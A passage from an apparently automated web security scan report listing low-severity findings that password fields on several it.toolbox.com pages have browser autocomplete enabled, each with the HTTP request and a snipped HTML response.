<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.63. http://it.toolbox.com/people/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /people/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 114614
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   People Sear
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/people/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.64. http://it.toolbox.com/people/dentrekin/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/dentrekin/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /people/dentrekin/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58359
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Demian Entr
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/people/dentrekin/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.65. http://it.toolbox.com/topics/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /topics/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /topics/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 77283
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Communit
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/topics/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.66. http://java.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://java.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: java.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connectio